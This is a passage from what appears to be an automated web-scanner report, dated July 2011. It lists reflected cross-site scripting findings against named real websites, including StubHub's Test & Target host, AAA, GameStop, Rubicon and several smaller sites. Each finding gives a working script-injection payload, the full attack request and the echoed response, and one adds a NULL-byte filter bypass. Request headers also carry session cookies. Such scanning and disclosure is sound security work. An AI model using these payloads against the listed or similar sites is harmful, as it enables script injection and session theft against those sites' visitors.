Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=8; __qca=P0-192291824-1311108181675; s_cc=true; s_pv=Boston.com%20home%20page; s_sq=nytbglobe%3D%2526pid%253DBoston.com%252520home%252520page%2526pidt%253D1%2526oid%253Dhttp%25253A//www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7%2526ot%253DA; s_ppv=16

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 879
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: l3vm104l3pluckcom
Set-Cookie: SiteLifeHost=l3vm104l3pluckcom; domain=boston.com; path=/
Date: Tue, 19 Jul 2011 20:44:54 GMT

RequestBatch.callbacks.daapiCallback0c1850<script>alert(1)</script>7319e07e022({"ResponseBatch":{"Messages":[{"Message":"ok","MessageTime":"07/19/2011 04:42:04:603 PM"}],"Responses":[{"Article":{"ArticleKey":{"Key":"b12c8144-b20e-11e0-aa83-a59fd6e1b552"},"Section":null,"Categori
...[SNIP]...

4.123. http://stubhub.tt.omtrdc.net/m2/stubhub/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://stubhub.tt.omtrdc.net
Path:   /m2/stubhub/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 17d1a<script>alert(1)</script>f9a0e7c0a1a was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/stubhub/mbox/standard?mboxHost=www.stubhub.com&mboxSession=1311100546147-926694&mboxPC=1308447436655-203098.17&mboxPage=1311100546147-926694&screenHeight=1200&screenWidth=1920&browserWidth=1065&browserHeight=723&browserTimeOffset=-300&colorDepth=32&mboxCount=2&mbox=TicketDetails_Pricing17d1a<script>alert(1)</script>f9a0e7c0a1a&mboxId=0&mboxTime=1311082548475&mboxURL=http%3A%2F%2Fwww.stubhub.com%2F%3Fticket_id%3D303237644%26GCID%3DC12289x970%26quantity_selected%3D2%26gtkw%3D-640518298&mboxReferrer=http%3A%2F%2Fbing.fansnap.com%2Fcheckout%2Findex%2F418563179%3Fctx%3Dc%253Dtix%253Bmt%253Dint%253Btsp%253D0%253Bdt%253D1%253Blpos%253D2%26ch%3Dbing%26quantity%3D2%26lp%3Dtrue%26poctx%3Drank%253D36%253BcrawlScore%253Dnull%253Bpop1%253D0.0374%253Bpop2%253D0.0374%253Bpop3%253D0.0374%253B%26afm%3D%26uet%3D-776896836%253A7925%253Apgstickets%257C%257Cbing%257Cmt%253Aint%253Bsz%253A1254%253Bid%253A389669&mboxVersion=40 HTTP/1.1
Host: stubhub.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 143
Date: Tue, 19 Jul 2011 18:39:17 GMT
Server: Test & Target

mboxFactories.get('default').get('TicketDetails_Pricing17d1a<script>alert(1)</script>f9a0e7c0a1a',0).setOffer(new mboxOfferDefault()).loaded();

4.124. http://support.fastteks.com/contact-us.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://support.fastteks.com
Path:   /contact-us.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5afa"><script>alert(1)</script>c2243c61dfa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d5afa\"><script>alert(1)</script>c2243c61dfa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact-us.php?d5afa"><script>alert(1)</script>c2243c61dfa=1 HTTP/1.1
Host: support.fastteks.com
Proxy-Connection: keep-alive
Referer: http://www.fastteks.com/TechSolutions/Contact-Us.aspx?id=443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=226585354.596719106.1311091190.1311091190.1311091190.1; __utmb=226585354.2.10.1311091190; __utmc=226585354; __utmz=226585354.1311091190.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 16:01:18 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8j DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.8
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 10979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-
...[SNIP]...
<form name="frmContact" method="post" action="/contact-us.php?d5afa\"><script>alert(1)</script>c2243c61dfa=1" class="conform" onsubmit="return formCheck(this);">
...[SNIP]...

4.125. http://tap-cdn.rubiconproject.com/partner/scripts/rubicon/page_parser.js [d parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tap-cdn.rubiconproject.com
Path:   /partner/scripts/rubicon/page_parser.js

Issue detail

The value of the d request parameter is copied into a JavaScript inline comment. The payload beb61*/alert(1)//5d56143d817 was submitted in the d parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /partner/scripts/rubicon/page_parser.js?d=support.gamehouse.combeb61*/alert(1)//5d56143d817 HTTP/1.1
Host: tap-cdn.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; khaos=GOVBRMNC-I-DXQD; lm="20 Jun 2011 13:04:50 GMT"; ruid=154dd07bb6adc1d6f31bfa10^10^1308614585^2915161843; put_1902=NsCNKTbG1n8vl4t9NZDDK2fBjy8vnIx8N5b7JrdL; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; cd=false; put_1986=3420415245200633085; put_1185=4325897289836481830; put_2132=E3F32BD05A8DDF4D5646D79640088B; put_2211=2814750682866683; rpb=5575%3D1%265852%3D1%264222%3D1%262114%3D1%264894%3D1%266432%3D1%264212%3D1%264120%3D1%266286%3D1%266811%3D1%26733%3D1%267259%3D1%264706%3D1

Response

HTTP/1.1 200 OK
Server: TRP Apache-Coyote/1.1
Last-Modified: Tue, 19 Jul 2011 20:26:09 GMT
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: text/javascript;charset=UTF-8
Cache-Control: max-age=3600
Expires: Tue, 19 Jul 2011 21:26:10 GMT
Date: Tue, 19 Jul 2011 20:26:10 GMT
Content-Length: 17453
Connection: close
Vary: Accept-Encoding


/*! Copyright 2009,2010 the Rubicon Project. All Rights Reserved. No permission is granted to use, copy or extend this code */


/*
   The requested resource (/oz/scripts/domains/gamehouse.combeb61*/alert(1)//5d56143d817/page_parser_hooks.js) is not available
*/


function oz_trim(A){return A.replace(/^\s+|\s+$/g,"");}function PageParser(){this.timeout=2000;this.doc=document;this.stopwords=null;this.init=function(
...[SNIP]...

4.126. http://umfcluj.ro/contact.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://umfcluj.ro
Path:   /contact.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1e92'-alert(1)-'6160d2b7976 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /contact.aspx?d1e92'-alert(1)-'6160d2b7976=1 HTTP/1.1
Host: umfcluj.ro
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uv0adfzgil2a3n55ieywykip; __utma=234819994.469475746.1311095567.1311095567.1311095567.1; __utmb=234819994.11.10.1311095567; __utmc=234819994; __utmz=234819994.1311095567.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:33:45 GMT
Content-Length: 60489


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>UMF</title>
<meta name="description" content="" />
<meta name="keywords" content=
...[SNIP]...
<script type="text/javascript" language="javascript">
document.getElementById("aspnetForm").action = '/contact.aspx?d1e92'-alert(1)-'6160d2b7976=1';
</script>
...[SNIP]...

4.127. http://waypointlivingspaces.com/locate-dealer [zip parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://waypointlivingspaces.com
Path:   /locate-dealer

Issue detail

The value of the zip request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29054"><script>alert(1)</script>c4c490e0e79 was submitted in the zip parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /locate-dealer?zip=29054"><script>alert(1)</script>c4c490e0e79 HTTP/1.1
Host: waypointlivingspaces.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://waypointlivingspaces.com/introducing-waypoint/?banner=110523
Cookie: SESSe2d9d7ad8ae79606f307f1e56494fe09=p5hnf2vbssre64l1tg1gvd29q4; has_js=1; __utma=150814896.783126044.1311108308.1311108308.1311108308.1; __utmb=150814896.2.9.1311108318174; __utmc=150814896; __utmz=150814896.1311108308.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:51:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 20:51:48 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18857

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head
...[SNIP]...
<input type="text" name="zip" id="zip" title="Enter your zip code or city and state" value="29054"><script>alert(1)</script>c4c490e0e79" />
...[SNIP]...

4.128. http://waypointlivingspaces.com/locate-dealer [zip parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://waypointlivingspaces.com
Path:   /locate-dealer

Issue detail

The value of the zip request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25749"><script>alert(1)</script>56a38b3928b was submitted in the zip parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /locate-dealer?zip=1001025749"><script>alert(1)</script>56a38b3928b HTTP/1.1
Host: waypointlivingspaces.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://waypointlivingspaces.com/introducing-waypoint/?banner=110523
Cookie: SESSe2d9d7ad8ae79606f307f1e56494fe09=p5hnf2vbssre64l1tg1gvd29q4; has_js=1; __utma=150814896.783126044.1311108308.1311108308.1311108308.1; __utmb=150814896.2.9.1311108318174; __utmc=150814896; __utmz=150814896.1311108308.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:56:11 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 20:56:11 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18872

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head
...[SNIP]...
<input type="text" name="zip" id="zip" title="Enter your zip code or city and state" value="1001025749"><script>alert(1)</script>56a38b3928b" />
...[SNIP]...

4.129. http://www.aaa.com/ [rurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aaa.com
Path:   /

Issue detail

The value of the rurl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8ccb"><script>alert(1)</script>7b05fa45749 was submitted in the rurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?rclub=36&rurl=http%3a%2f%2fwww.nne.aaa.com%2fen-nne%2fPages%2fHome.aspxe8ccb"><script>alert(1)</script>7b05fa45749 HTTP/1.1
Host: www.aaa.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.aaa.com/scripts/WebObjects.dll/ZipCode.woa/wa/route
Cookie: zipcode=05672|AAA|36

Response (redirected)

HTTP/1.1 200 Apple
Date: Tue, 19 Jul 2011 19:05:00 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONi OUR NOR IND PHY ONL UNI PUR COM NAV INT DEM STA PRE"
UniqueName: CHIWWW3
X-Powered-By: ASP.NET
content-type: text/html
set-cookie: zipcode=05672|AAA|36; version="1"; expires=Wed, 18-Jul-2012 19:05:00 GMT; path=/; domain=aaa.com
set-cookie: zipcode=05672|AAA|36; version="1"; expires=Wed, 18-Jul-2012 19:05:00 GMT; path=/; domain=aaa.com
content-length: 1409

<HTML>
<HEAD>
<META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
<META HTTP-EQUIV="REFRESH" CONTENT="5;URL=http://www.nne.aaa.com/en-nne/Pages/Home.aspxe8ccb"><script>alert(1)</script>7b05fa45749?zip=05672&referer=www.aaa.com">
...[SNIP]...

4.130. http://www.aaa.com/ [rurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aaa.com
Path:   /

Issue detail

The value of the rurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b429'%3balert(1)//05cb045aa3 was submitted in the rurl parameter. This input was echoed as 8b429';alert(1)//05cb045aa3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?rclub=36&rurl=http%3a%2f%2fwww.nne.aaa.com%2fen-nne%2fPages%2fHome.aspx8b429'%3balert(1)//05cb045aa3 HTTP/1.1
Host: www.aaa.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.aaa.com/scripts/WebObjects.dll/ZipCode.woa/wa/route
Cookie: zipcode=05672|AAA|36

Response (redirected)

HTTP/1.1 200 Apple
Date: Tue, 19 Jul 2011 19:05:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONi OUR NOR IND PHY ONL UNI PUR COM NAV INT DEM STA PRE"
UniqueName: CHIWWW3
X-Powered-By: ASP.NET
content-type: text/html
set-cookie: zipcode=05672|AAA|36; version="1"; expires=Wed, 18-Jul-2012 19:05:08 GMT; path=/; domain=aaa.com
set-cookie: zipcode=05672|AAA|36; version="1"; expires=Wed, 18-Jul-2012 19:05:08 GMT; path=/; domain=aaa.com
content-length: 1361

<HTML>
<HEAD>
<META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
<META HTTP-EQUIV="REFRESH" CONTENT="5;URL=http://www.nne.aaa.com/en-nne/Pages/Home.aspx8b429';alert(1)//05cb045aa3?zip=05672&
...[SNIP]...
<!--
       window.location.replace('http://www.nne.aaa.com/en-nne/Pages/Home.aspx8b429';alert(1)//05cb045aa3?zip=05672&referer=www.aaa.com');
   // -->
...[SNIP]...

4.131. http://www.aaa.com/scripts/WebObjects.dll/ZipCode.woa/wa/route [rurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aaa.com
Path:   /scripts/WebObjects.dll/ZipCode.woa/wa/route

Issue detail

The value of the rurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 881bf'%3balert(1)//43f8c51a252 was submitted in the rurl parameter. This input was echoed as 881bf';alert(1)//43f8c51a252 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /scripts/WebObjects.dll/ZipCode.woa/wa/route?rclub=36&rurl=http%3a%2f%2fwww.nne.aaa.com%2fen-nne%2fPages%2fHome.aspx881bf'%3balert(1)//43f8c51a252 HTTP/1.1
Host: www.aaa.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.aaa.com/scripts/WebObjects.dll/ZipCode.woa/wa/route
Cookie: zipcode=05672|AAA|36

Response

HTTP/1.1 200 Apple
Date: Tue, 19 Jul 2011 19:05:05 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONi OUR NOR IND PHY ONL UNI PUR COM NAV INT DEM STA PRE"
UniqueName: CHIWWW1
X-Powered-By: ASP.NET
content-type: text/html
set-cookie: zipcode=05672|AAA|36; version="1"; expires=Wed, 18-Jul-2012 19:05:05 GMT; path=/; domain=aaa.com
set-cookie: zipcode=05672|AAA|36; version="1"; expires=Wed, 18-Jul-2012 19:05:05 GMT; path=/; domain=aaa.com
content-length: 1364

<HTML>
<HEAD>
<META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
<META HTTP-EQUIV="REFRESH" CONTENT="5;URL=http://www.nne.aaa.com/en-nne/Pages/Home.aspx881bf';alert(1)//43f8c51a252?zip=05672
...[SNIP]...
<!--
       window.location.replace('http://www.nne.aaa.com/en-nne/Pages/Home.aspx881bf';alert(1)//43f8c51a252?zip=05672&referer=www.aaa.com');
   // -->
...[SNIP]...

4.132. http://www.aaa.com/scripts/WebObjects.dll/ZipCode.woa/wa/route [rurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aaa.com
Path:   /scripts/WebObjects.dll/ZipCode.woa/wa/route

Issue detail

The value of the rurl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d9d1"><script>alert(1)</script>99de8810c92 was submitted in the rurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /scripts/WebObjects.dll/ZipCode.woa/wa/route?rclub=36&rurl=http%3a%2f%2fwww.nne.aaa.com%2fen-nne%2fPages%2fHome.aspx4d9d1"><script>alert(1)</script>99de8810c92 HTTP/1.1
Host: www.aaa.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.aaa.com/scripts/WebObjects.dll/ZipCode.woa/wa/route
Cookie: zipcode=05672|AAA|36

Response

HTTP/1.1 200 Apple
Date: Tue, 19 Jul 2011 19:05:02 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONi OUR NOR IND PHY ONL UNI PUR COM NAV INT DEM STA PRE"
UniqueName: CHIWWW1
X-Powered-By: ASP.NET
content-type: text/html
set-cookie: zipcode=05672|AAA|36; version="1"; expires=Wed, 18-Jul-2012 19:05:02 GMT; path=/; domain=aaa.com
set-cookie: zipcode=05672|AAA|36; version="1"; expires=Wed, 18-Jul-2012 19:05:02 GMT; path=/; domain=aaa.com
content-length: 1409

<HTML>
<HEAD>
<META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
<META HTTP-EQUIV="REFRESH" CONTENT="5;URL=http://www.nne.aaa.com/en-nne/Pages/Home.aspx4d9d1"><script>alert(1)</script>99de8810c92?zip=05672&referer=www.aaa.com">
...[SNIP]...

4.133. http://www.gamestop.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gamestop.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2b620'><script>alert(1)</script>14a508ceae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?2b620'><script>alert(1)</script>14a508ceae=1 HTTP/1.1
Host: www.gamestop.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Cnection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server, Enterprise Edition
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Tue, 19 Jul 2011 16:02:32 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: LocaleCookie=en-us; expires=Mon, 19-Jul-2021 16:02:32 GMT; path=/
Set-Cookie: CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383,3375,4265,4287,3852,4300,4151,3362,4228,4227,4226,3383; path=/
Set-Cookie: CactusState=V=1; path=/
Content-Length: 317624


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="Con
...[SNIP]...
<a href='/Profiles/Login.aspx?ReturnUrl=/Default.aspx?2b620'><script>alert(1)</script>14a508ceae=1' id='header_auth_actions' rel='nofollow'>
...[SNIP]...

4.134. http://www.gamestop.com/JavaScript/CertonaTable.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.gamestop.com
Path:   /JavaScript/CertonaTable.htm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c4c2e'%20a%3db%2058959062e85 was submitted in the REST URL parameter 1. This input was echoed as c4c2e' a=b 58959062e85 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /JavaScriptc4c2e'%20a%3db%2058959062e85/CertonaTable.htm HTTP/1.1
Host: www.gamestop.com
Proxy-Connection: keep-alive
Referer: http://www.gamestop.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
